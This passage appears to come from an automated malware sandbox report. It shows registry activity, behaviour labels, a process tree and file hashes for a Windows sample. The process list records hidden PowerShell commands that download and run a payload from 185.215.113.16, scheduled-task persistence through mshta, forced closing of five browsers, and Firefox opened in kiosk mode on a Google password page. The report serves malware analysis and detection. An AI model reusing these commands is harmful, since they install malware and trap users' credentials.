| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3H3K555D7JDX1PMQ5U9LJFN9WVU5S.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe
"C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe
"C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe"
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SettingsHandlers.OneDriveSaving.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe
C:\Users\Admin\AppData\Local\Temp\10062560101\UXwM0dy.exe
"C:\Users\Admin\AppData\Local\Temp\10062560101\UXwM0dy.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Roaming\winsvcs\WindowsPrinterService.exe
"C:/Users/Admin/AppData/Roaming/winsvcs/WindowsPrinterService.exe"
C:\Users\Admin\AppData\Local\Temp\10062570101\12c2d2f481.exe
"C:\Users\Admin\AppData\Local\Temp\10062570101\12c2d2f481.exe"
C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe
"C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn FKRjwmaq1Wy /tr "mshta C:\Users\Admin\AppData\Local\Temp\Ro1bFndli.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\Ro1bFndli.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn FKRjwmaq1Wy /tr "mshta C:\Users\Admin\AppData\Local\Temp\Ro1bFndli.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DYGSWKX2LYZUHEALVPVSVELUY8PS3KUJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10062730121\am_no.cmd" "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10062730121\am_no.cmd" any_word
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
"C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "j0vHkma9RZa" /tr "mshta \"C:\Temp\7Ate2U9Z1.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\7Ate2U9Z1.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe
"C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe"
C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe
"C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe"
C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe
"C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1996 -ip 1996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 800
C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe
"C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe"
C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe
"C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe"
C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe
"C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe
"C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe
"C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe
"C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe"
C:\Users\Admin\AppData\Local\Temp\3H3K555D7JDX1PMQ5U9LJFN9WVU5S.exe
"C:\Users\Admin\AppData\Local\Temp\3H3K555D7JDX1PMQ5U9LJFN9WVU5S.exe"
C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe
"C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1900 -prefMapHandle 1892 -prefsLen 27209 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8c4156f6-e391-4bc0-b594-466f9199cb58} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2444 -prefMapHandle 2400 -prefsLen 28129 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d80d95b0-4188-4705-a6b6-d07318703a7e} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2848 -childID 1 -isForBrowser -prefsHandle 3024 -prefMapHandle 3040 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {42760d12-e141-42ce-b531-b4a97c9ea3b1} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4124 -childID 2 -isForBrowser -prefsHandle 4116 -prefMapHandle 4112 -prefsLen 32619 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ac157a1-f8fb-4adc-b3bb-7ed18f7fd852} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4660 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4744 -prefMapHandle 4740 -prefsLen 32619 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {563cdd56-265b-4054-a3ce-c3d948f9d5f7} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5264 -childID 3 -isForBrowser -prefsHandle 5012 -prefMapHandle 5360 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5d4ea74e-7da4-4994-9ef7-ef8eb95057de} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5600 -childID 4 -isForBrowser -prefsHandle 5520 -prefMapHandle 5528 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a30cbc54-bc37-4aed-8b06-07888ef366fe} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5504 -childID 5 -isForBrowser -prefsHandle 5728 -prefMapHandle 5732 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fcfe0068-0237-4ee5-bd03-8a36deaf886f} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" tab
C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe
"C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
Network
Files
| MD5 | 52c201c0b0ced0f0c3c117fda5ce6d7f |
| SHA1 | a9ae4e9636bd447b27defa568881e845ee5c194d |
| SHA256 | 02909e7ced7d7c63993aedaa95ac1f6884908d5177759aa6f6ede23b5356f829 |
| SHA512 | d507c5216901634801a5264a596c675a4982702ec2b28c688ccdb0a2a54990d07e9feaa04a76b4153c21a59a889240a3b93697896a22d31831bc173f11530033 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\prefs-1.js
| MD5 | fa166feb0f3da3b9855974a55dda3100 |
| SHA1 | 41b4a4aad99bca7938a04e09d8b4f721cef06488 |
| SHA256 | 2bc2e2fa5441da48f17f525ec70a5cb4555e4b1d1d2527fd83ccb103ea013d70 |
| SHA512 | 0c04f3a77185dee9187de48a32ec48d1343407e47ad98ff2684fa1e19a457e0dadd92fbf09ae1dac55995765072938191ce17bea10340d69456e526d4a05ee02 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89
| MD5 | 0c068cd0f69e1d3d0208c1da1ee0e15c |
| SHA1 | 369d15394d5e19686aada59ecd72135e92f13240 |
| SHA256 | 431a590a033bcc457de22d761c23f213fdae04ce3a7c9e0471fd502170ae6b79 |
| SHA512 | b9f99d7bba5bd5c4fab593673c99ad66f9ec8e4e925f8bb046baca8bde603ca5df40e00ad42d0450d06f615955f6803d27778299b94308f83871d7719fcae204 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | 0a8747a2ac9ac08ae9508f36c6d75692 |
| SHA1 | b287a96fd6cc12433adb42193dfe06111c38eaf0 |
| SHA256 | 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03 |
| SHA512 | 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
| MD5 | daf7ef3acccab478aaa7d6dc1c60f865 |
| SHA1 | f8246162b97ce4a945feced27b6ea114366ff2ad |
| SHA256 | bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e |
| SHA512 | 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
| MD5 | bf957ad58b55f64219ab3f793e374316 |
| SHA1 | a11adc9d7f2c28e04d9b35e23b7616d0527118a1 |
| SHA256 | bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda |
| SHA512 | 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\prefs-1.js
| MD5 | 76a90b8dcd3782db143eb4191e2686c5 |
| SHA1 | 8b4f7c6134bbbc858e409e96a388fa93672f5fb3 |
| SHA256 | 2cb2435291457d3164c7fd4c64b0f555b9c1be463e96425f6bdc4a81d49933b0 |
| SHA512 | 0cf35a410cb3819a8c906e5a118bcd3815ef4c793afc19bee2d92bca549e01dcdd7825f50b7ab2357080b4af8365050d00b14e3ab5628c5afdf49b4d2993bcab |